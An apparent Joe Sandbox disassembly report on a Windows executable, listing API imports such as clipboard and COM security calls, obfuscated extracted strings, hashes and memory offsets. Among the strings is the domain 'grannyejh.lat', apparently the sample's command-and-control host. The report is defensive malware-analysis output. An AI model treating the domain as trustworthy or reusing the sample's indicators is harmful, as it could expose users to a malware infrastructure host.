                                                                                                                                      Similarity
                                                                                                                                      • API ID: MetricsSystem
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 4116985748-0
                                                                                                                                      • Opcode ID: 5d644a1a770608b13facf271ce148477aa9eaac83cb491c78634d3c21ba9b618
                                                                                                                                      • Instruction ID: 25b67dd5c9de23268ffdff418aa0df1ace25e739cbd36745d59bc728b3d50acd
                                                                                                                                      • Opcode Fuzzy Hash: 5d644a1a770608b13facf271ce148477aa9eaac83cb491c78634d3c21ba9b618
                                                                                                                                      • Instruction Fuzzy Hash: 0811B2F0E142049FDB40EFBCD9466ADBFF4AB48304F00452AE888E7350E734A9588F86
                                                                                                                                      APIs
                                                                                                                                      • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040C8DC
                                                                                                                                      • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040C902
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2923052938.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_NHEXQatKdE.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InitializeSecurity
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 640775948-0
                                                                                                                                      • Opcode ID: 2113889d20fd7c9c411ab6a2aba348bd901a827719f9c1a9d7cfb8ea4c61774b
                                                                                                                                      • Instruction ID: 95cf4bee976dae0bcf9a79aead2fc5f500003fb62c798666b3966767b998ac5e
                                                                                                                                      • Opcode Fuzzy Hash: 2113889d20fd7c9c411ab6a2aba348bd901a827719f9c1a9d7cfb8ea4c61774b
                                                                                                                                      • Instruction Fuzzy Hash: 7EE067383C83017EF6B84754AC17F1536166B86F22F745315B7653D6E4CAE03159890D
                                                                                                                                      APIs
                                                                                                                                      • GetForegroundWindow.USER32 ref: 0043B5B5
                                                                                                                                      • GetForegroundWindow.USER32 ref: 0043B5D0
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2923052938.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_NHEXQatKdE.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ForegroundWindow
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2020703349-0
                                                                                                                                      • Opcode ID: eb91c03ac02748fd9a52c84624d36c8f3b0abdddf9006fb09863476707b900f4
                                                                                                                                      • Instruction ID: c9c837826981fc4d2580c52c24397bb06af3c9db5131d6b4f1e0de87f73497d6
                                                                                                                                      • Opcode Fuzzy Hash: eb91c03ac02748fd9a52c84624d36c8f3b0abdddf9006fb09863476707b900f4
                                                                                                                                      • Instruction Fuzzy Hash: A8D05EECE2000057C744AB61FC4B4173629D797309715953AFC0782312D536E428858B
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2923052938.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_NHEXQatKdE.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 64d04505e51facc5b32f2d46e3ea49eda4a71b90d2ad25abc0127d4398331492
                                                                                                                                      • Instruction ID: a1e78b3ceb65990a0dc15ec4eb894bfdfd4cd795acfd92ef14c0ecb3ae398032
                                                                                                                                      • Opcode Fuzzy Hash: 64d04505e51facc5b32f2d46e3ea49eda4a71b90d2ad25abc0127d4398331492
                                                                                                                                      • Instruction Fuzzy Hash: CBE02676595510BAD6152F38BC0BB2B36249F97B63F02243AF40190026EB6ED801C1DF
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2923052938.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_NHEXQatKdE.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: BlanketProxy
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3890896728-0
                                                                                                                                      • Opcode ID: a5e332c65244988efad0a3fad62dab6d46846a63c729a6b1c9e9e974a5697ce1
                                                                                                                                      • Instruction ID: b0e67e51cabac05ef7007a9fd91dfbb9b9c3aa36a7932c1a17be2c81c6bee5d5
                                                                                                                                      • Opcode Fuzzy Hash: a5e332c65244988efad0a3fad62dab6d46846a63c729a6b1c9e9e974a5697ce1
                                                                                                                                      • Instruction Fuzzy Hash: 7CF098B45097029FE314DF25D5A8B1ABBF1BB84304F10881CE5998B391D7B5A548CF82
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2923052938.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_NHEXQatKdE.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: BlanketProxy
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3890896728-0
                                                                                                                                      • Opcode ID: b9ace7e5ecfa49b5e397008da619b278df4797f36f2894134675a55ea546d02c
                                                                                                                                      • Instruction ID: 14902b2bb6b259fc0b89299fd859114d3daed4383d8227e32e78047560e3e05d
                                                                                                                                      • Opcode Fuzzy Hash: b9ace7e5ecfa49b5e397008da619b278df4797f36f2894134675a55ea546d02c
                                                                                                                                      • Instruction Fuzzy Hash: 25F074B45093419FE314DF61D5A871BBBE1FBC8308F20891CE0980B695C3B996498F82
                                                                                                                                      APIs
                                                                                                                                      • RtlFreeHeap.NTDLL(?,00000000), ref: 0043964B
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2923052938.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_NHEXQatKdE.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: FreeHeap
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3298025750-0
                                                                                                                                      • Opcode ID: 0ab2c1de21248f5cc5ebcf9bf3fcb36daf71926275e6500f406ad94933e9c0d7
                                                                                                                                      • Instruction ID: def4dad81fe2a48fb23eafc83009012cc86c19b116f157a98ec82edf970c520b
                                                                                                                                      • Opcode Fuzzy Hash: 0ab2c1de21248f5cc5ebcf9bf3fcb36daf71926275e6500f406ad94933e9c0d7
                                                                                                                                      • Instruction Fuzzy Hash: B9C08C30000622FBC2103F14BC0BB893A20EF02312F0314B1B441A90B1E724CC50C6C8
                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2923052938.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_NHEXQatKdE.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
                                                                                                                                      • String ID: B$f$g$i$j$o$t$y$z$}$~
                                                                                                                                      • API String ID: 2832541153-3431088675
                                                                                                                                      • Opcode ID: 0160fd8d480660f35874ceb680c4164cf840f46fd641679df1f178a62e5b380e
                                                                                                                                      • Instruction ID: 2b5bc8521efa19f50317a139f46d1ceb2265f287572faca6612f44f9b77b85ae
                                                                                                                                      • Opcode Fuzzy Hash: 0160fd8d480660f35874ceb680c4164cf840f46fd641679df1f178a62e5b380e
                                                                                                                                      • Instruction Fuzzy Hash: 7B417CB050C3808ED301AF78D94935EBFE1AB9A308F09497EE5C986392D67D8558C767
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2923052938.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_NHEXQatKdE.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: >t0$!~Cp$%RlT$-z&|$1B?D$<Z9\$>f?x$Ab[d$G:<$^jUl$^nY`$`Vdh$pJkL$r&^8
                                                                                                                                      • API String ID: 0-1663888199
                                                                                                                                      • Opcode ID: ec9d5ad6efa2e0e83d3a944f8f5fdcd0d6edd0840de8023ee4da326fa5a8889b
                                                                                                                                      • Instruction ID: 0f071aa952705e74209860cce06fa5e6359a398553a4f88fc65c3bdd75f4b665
                                                                                                                                      • Opcode Fuzzy Hash: ec9d5ad6efa2e0e83d3a944f8f5fdcd0d6edd0840de8023ee4da326fa5a8889b
                                                                                                                                      • Instruction Fuzzy Hash: 3A02BBB5200B01CFD3248F79D8557A7BBE1FB45310F148A2DE5AA9BBA0DBB4A405CF48
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2923052938.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_NHEXQatKdE.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: *;$1nnh$9./`$GAWJ$U$[\V$_66N$boaa$dein$hl$lg$qcce$w
                                                                                                                                      • API String ID: 0-714444217
                                                                                                                                      • Opcode ID: 3f2d1fac863bf35d4592e66923841910d621e31973831fa63d5a8e0d7de2c42e
                                                                                                                                      • Instruction ID: dd8b33ae5b7dd411e3d241eda01dfc98351f3dc95584a99a473f0adb86a77f16
                                                                                                                                      • Opcode Fuzzy Hash: 3f2d1fac863bf35d4592e66923841910d621e31973831fa63d5a8e0d7de2c42e
                                                                                                                                      • Instruction Fuzzy Hash: 3C524BB190C3508FC725DF28C8407AFBBE1AF96304F08867EE8E59B392D6399945C756
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2923052938.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_NHEXQatKdE.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: $A$C$-]^C$DE$K%H'$K-r/$N)C+$Q9];$S1]3$YRSG$Z5P7$]ZXD$ojgm$|!A#
                                                                                                                                      • API String ID: 0-1681748943
                                                                                                                                      • Opcode ID: f005c0901f789223cd58cc448166d20cff71cb87bd5f0fe4abff1d5146f5dd95
                                                                                                                                      • Instruction ID: f5ab92e2c547fcbf8ef1c11eaf796bbbc0b57f4f6981f81f49341ceaf64e483c
                                                                                                                                      • Opcode Fuzzy Hash: f005c0901f789223cd58cc448166d20cff71cb87bd5f0fe4abff1d5146f5dd95
                                                                                                                                      • Instruction Fuzzy Hash: 312267B16083908FD714DF29E85136BBBE1AFD6304F09883EE4D597352E639D905CB4A
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2923052938.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_NHEXQatKdE.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: U%RV$U%RV$U%RV$U%RV$U%RV$U%RV$Y%RV$Y%RV$Y%RV$Y%RV$Y%RV$Y%RV
                                                                                                                                      • API String ID: 0-3684172202
                                                                                                                                      • Opcode ID: adf0c2e9c633c089042a032d080fee9fb6394e7b4a1da8ee1e4d39c50c1df3b3
                                                                                                                                      • Instruction ID: 3b04f31993b6cd925e01e16ca2454c89d640cb841f72f26cd3d2d99b156ab46a
                                                                                                                                      • Opcode Fuzzy Hash: adf0c2e9c633c089042a032d080fee9fb6394e7b4a1da8ee1e4d39c50c1df3b3
                                                                                                                                      • Instruction Fuzzy Hash: 3B522276B01122DBCB18CF68DC506AEB7B2FB8A310F29817CD846A7394D7789D51CB84
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2923052938.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_NHEXQatKdE.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: rst$)A.C$CzE|$DE$M%J'$[5A7$^1V3$m!C#$q=_?${-G/
                                                                                                                                      • API String ID: 0-1133353913
                                                                                                                                      • Opcode ID: fc8610a4db3fcdaaf23b875d54acbd015691132519733419f9fbcf1efae46892
                                                                                                                                      • Instruction ID: 062e4c2e49ed4084361cfd2dc51809e3c57bf4f9607e9aeb51279615d27ce93a
                                                                                                                                      • Opcode Fuzzy Hash: fc8610a4db3fcdaaf23b875d54acbd015691132519733419f9fbcf1efae46892
                                                                                                                                      • Instruction Fuzzy Hash: 9B915772A083208BD714CF15D8913ABB7E1FFD5314F49892DE8CA9B390E7789904CB86
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2923052938.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_NHEXQatKdE.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: fgx$/^ P$4V*h$6R!T$RaGc$fWo$h]m_$jWo
                                                                                                                                      • API String ID: 0-3660092546
                                                                                                                                      • Opcode ID: e7da89803c040491e4d2fe438a7d7a413fb54a49df1d932ccab013ebdb27bf06
                                                                                                                                      • Instruction ID: eb508a7ccd9695fc57cfbcc3df19fb92cf6cbc24581256188924ca0b1646c8cf
                                                                                                                                      • Opcode Fuzzy Hash: e7da89803c040491e4d2fe438a7d7a413fb54a49df1d932ccab013ebdb27bf06
                                                                                                                                      • Instruction Fuzzy Hash: AC2225766083118BC724CF28C8916ABB7F2FFC9754F198A6DE8C95B354E7388941C746
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 0043B1C0: LdrInitializeThunk.NTDLL(0043D3E8,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043B1EE
                                                                                                                                      • FreeLibrary.KERNEL32(?), ref: 0041998A
                                                                                                                                      • FreeLibrary.KERNEL32(?), ref: 00419A1B
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2923052938.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_NHEXQatKdE.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: FreeLibrary$InitializeThunk
                                                                                                                                      • String ID: *+$#v$GI
                                                                                                                                      • API String ID: 764372645-3120302328
                                                                                                                                      • Opcode ID: a0edb99b79fe52b678b56532b2e2bc10beeb045d480d98f0be9cd1fdf13272b3
                                                                                                                                      • Instruction ID: c5c4e280d43ba248472c341612864cb891257eec2a5ae9e7b1fbbb01ee1924c6
                                                                                                                                      • Opcode Fuzzy Hash: a0edb99b79fe52b678b56532b2e2bc10beeb045d480d98f0be9cd1fdf13272b3
                                                                                                                                      • Instruction Fuzzy Hash: 44A224317083405BD721CF68CC907ABBBA2AFC5354F28892DE5998B3A2D775DC85CB46
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2923052938.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_NHEXQatKdE.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: [)u$+,$7$B`A$P<?$gfff$s
                                                                                                                                      • API String ID: 0-3436754772
                                                                                                                                      • Opcode ID: 6d9b583597e22855f98ac2dc2515ea7d2d91de0a60f0dd18539040e276828374
                                                                                                                                      • Instruction ID: 6d10214af21920bb08381577f264cbe6c481156426303290986e2969e01ca657
                                                                                                                                      • Opcode Fuzzy Hash: 6d9b583597e22855f98ac2dc2515ea7d2d91de0a60f0dd18539040e276828374
                                                                                                                                      • Instruction Fuzzy Hash: F10236316087418FD724CF28D8907AB7BE2FBCA314F59862DE4C997392D7389945CB4A
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2923052938.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_NHEXQatKdE.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: CC$G|$KG$grannyejh.lat$k{pm$ta`u
                                                                                                                                      • API String ID: 0-828990602
                                                                                                                                      • Opcode ID: 4f253eed3f5f69b2ee2b82aa87d8c0b0c3e4401e760ee46f82dce1e29cf8ef6c
                                                                                                                                      • Instruction ID: 20d41328c34446dd9aef344bb0e1a8efa5e2f47056c53e3d15000b74550e283f
                                                                                                                                      • Opcode Fuzzy Hash: 4f253eed3f5f69b2ee2b82aa87d8c0b0c3e4401e760ee46f82dce1e29cf8ef6c
                                                                                                                                      • Instruction Fuzzy Hash: DEA1D0B12017418FD319CF29C491B62BBE2EF96304B2985AED0979F7A2C778D802CF55
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2923052938.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_NHEXQatKdE.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: D_$EW$HY$HY$c8[:
                                                                                                                                      • API String ID: 0-707503002
                                                                                                                                      • Opcode ID: 02345c6d571df1dd11e13c004ba1aea8720a1f96eb7346d2109cfc41cd1b79d1
                                                                                                                                      • Instruction ID: f25270122beee34f42c382278f46ba8f34327bf83344a6fa77f9d714242467c6
                                                                                                                                      • Opcode Fuzzy Hash: 02345c6d571df1dd11e13c004ba1aea8720a1f96eb7346d2109cfc41cd1b79d1
                                                                                                                                      • Instruction Fuzzy Hash: DBE15775E012218BCB10CF58C8406BAB7F2FF9A314F69819DD8816F755E739AC42CB94
                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2923052938.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_NHEXQatKdE.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: FreeLibrary
                                                                                                                                      • String ID: w$#v
                                                                                                                                      • API String ID: 3664257935-1753275396
                                                                                                                                      • Opcode ID: c9066039513997db2445060aa8e9b38c66cbaa24a3688fc86eb51563c399794b
                                                                                                                                      • Instruction ID: e5cd652fddbadd988d243e243d0aadc4afe38972491594b784693925ed4a9d7c
                                                                                                                                      • Opcode Fuzzy Hash: c9066039513997db2445060aa8e9b38c66cbaa24a3688fc86eb51563c399794b
                                                                                                                                      • Instruction Fuzzy Hash: 68914A71B4C3918BE3218F28D8917ABBBD29FE2314F284A2DE4D9473C2D6399405C757
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2923052938.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_NHEXQatKdE.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: [z$jrTW$v}$w
                                                                                                                                      • API String ID: 0-2493215026
                                                                                                                                      • Opcode ID: 12180ba4b0b725743f2b7951f9e97ea8ae81b2807934d80b04abb838223cd7e8
                                                                                                                                      • Instruction ID: 8656eb5187c6e4d52eb22cb8708b5f05e84ad9d0006bacdacbacfb1dfeb224e1
                                                                                                                                      • Opcode Fuzzy Hash: 12180ba4b0b725743f2b7951f9e97ea8ae81b2807934d80b04abb838223cd7e8
                                                                                                                                      • Instruction Fuzzy Hash: 7EB1F97150C3908BD319CB2984A03ABBFE29FD7304F58896DE4D65B3C6D6398D09CB96
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2923052938.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_NHEXQatKdE.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: $:'+$782397A2CDD031F1C683EA0F4CB0333A$CD$~$A&
                                                                                                                                      • API String ID: 0-3205615796
                                                                                                                                      • Opcode ID: d8f07f3b46f879c8fcc9d59f84a537cc67c9997dbc93c5a9b72b0331e43290b5
                                                                                                                                      • Instruction ID: 19e5cc09c4bccfc8c1e2bd8a47edc933c242acc168ce1e9223e8ccf287daec48
                                                                                                                                      • Opcode Fuzzy Hash: d8f07f3b46f879c8fcc9d59f84a537cc67c9997dbc93c5a9b72b0331e43290b5
                                                                                                                                      • Instruction Fuzzy Hash: 59B114B1A083408BD714CF35C84166BBBE2EFD2318F18892DE5D58B392D739C50ACB5A
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2923052938.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_NHEXQatKdE.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: "rB$RnB$tB
                                                                                                                                      • API String ID: 0-4216038165
                                                                                                                                      • Opcode ID: 194f4e7ea056f9dbf4dc3172a98edd4d498bfef096048f559264ef87dfea744a
                                                                                                                                      • Instruction ID: 5db433618846bbee7fbdea8b7d170a8d74a15166589cd4b7a37e776e253fe78c
                                                                                                                                      • Opcode Fuzzy Hash: 194f4e7ea056f9dbf4dc3172a98edd4d498bfef096048f559264ef87dfea744a
                                                                                                                                      • Instruction Fuzzy Hash: 7E325776A08391CFD310CF28E89072B77E2AFC6324F59866DE4955B3A1D7399C04CB96
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2923052938.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_NHEXQatKdE.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: +xz$|~$|~+xz
                                                                                                                                      • API String ID: 0-1674398901
                                                                                                                                      • Opcode ID: 01274263c0ecce3d35a03d44141a69670113512c221da472d3dda66ce547e122
                                                                                                                                      • Instruction ID: b710419fa9807c675cdca11690d141e1ac49870e402d67e11a2f4585279bbe7e
                                                                                                                                      • Opcode Fuzzy Hash: 01274263c0ecce3d35a03d44141a69670113512c221da472d3dda66ce547e122
                                                                                                                                      • Instruction Fuzzy Hash: 24C110715083108BD320CF18C8527ABB7F1FF92350F098A6DE5C69B3A5E7799845CB96
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2923052938.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_NHEXQatKdE.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: )$fG$pxh~
                                                                                                                                      • API String ID: 0-1348051669
                                                                                                                                      • Opcode ID: 10079d67cbf96ecc1c28fdbb896d63402551c9f6f8342cccce1b53eb98156813
                                                                                                                                      • Instruction ID: a25b475c766a38413ac254536a50495f94ce246e951d1433cb160c56cba00a1d
                                                                                                                                      • Opcode Fuzzy Hash: 10079d67cbf96ecc1c28fdbb896d63402551c9f6f8342cccce1b53eb98156813
                                                                                                                                      • Instruction Fuzzy Hash: D861C17060C3D18BD7258F3594A17EBBBE1EF92304F28486DC0DD8B282DB79510A8B56
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2923052938.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_NHEXQatKdE.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                      • String ID: JK$U{
                                                                                                                                      • API String ID: 2994545307-2804647760
                                                                                                                                      • Opcode ID: 30a7fb4acf67063eed21c48f58556268d6ae000eb71d3ff63a0b7279d3089a44
                                                                                                                                      • Instruction ID: a14205f3f9ddc08b031849de81a62b0b169a4fcc75bf251c8f0ed7efbd537042
                                                                                                                                      • Opcode Fuzzy Hash: 30a7fb4acf67063eed21c48f58556268d6ae000eb71d3ff63a0b7279d3089a44
                                                                                                                                      • Instruction Fuzzy Hash: DCD16872B083209BD720DF24DC9266BB3E1EFE1314F59853DE8C597391E6389D05879A
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2923052938.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_NHEXQatKdE.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: .$_P
                                                                                                                                      • API String ID: 0-145094978
                                                                                                                                      • Opcode ID: f01ac957da31c575a7f29d01c351f92228aa7eac6a35bb5ae4b66a4ba069a67e
                                                                                                                                      • Instruction ID: 99d01bb25ab6619c8d93c1b9e320f109d83fc958490068c02a03de64d3271c89
                                                                                                                                      • Opcode Fuzzy Hash: f01ac957da31c575a7f29d01c351f92228aa7eac6a35bb5ae4b66a4ba069a67e
                                                                                                                                      • Instruction Fuzzy Hash: 55D1F37A218316CBCB288F38EC9126B73E2FF4B351F4A987DD581872A0F37989548755
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2923052938.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_NHEXQatKdE.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: KM$Y[
                                                                                                                                      • API String ID: 0-3358059348
                                                                                                                                      • Opcode ID: 576da5b0a6bb03a314e181509f7a5074a1ff0df0cd005910a60b000e5116add0
                                                                                                                                      • Instruction ID: 1ea4a5005bf6dce27b4f4a81d99fe56a43f8250439d3046256d0923e83aace4e
                                                                                                                                      • Opcode Fuzzy Hash: 576da5b0a6bb03a314e181509f7a5074a1ff0df0cd005910a60b000e5116add0
                                                                                                                                      • Instruction Fuzzy Hash: 0DD1D1B9A00204DFDB14CF58E8C1BAE7BB1FF5A314F6440A9E945AB366D7349812CF58
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2923052938.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_NHEXQatKdE.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: fG$pxh~
                                                                                                                                      • API String ID: 0-2018652497
                                                                                                                                      • Opcode ID: dbd081f94b0594dfe365d34bc537e2cf5afcedd78e177b6caac3b9844118e796
                                                                                                                                      • Instruction ID: 3956c6f1c4573dbc7244af6f1c67d7fc06972784f67e9f7b14ac6d9a0432d960
                                                                                                                                      • Opcode Fuzzy Hash: dbd081f94b0594dfe365d34bc537e2cf5afcedd78e177b6caac3b9844118e796
                                                                                                                                      • Instruction Fuzzy Hash: 2A61D17460C3D18BD3258F3594A17ABBBE1EF92304F68485DD0DD8B782DB7854068B5A
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
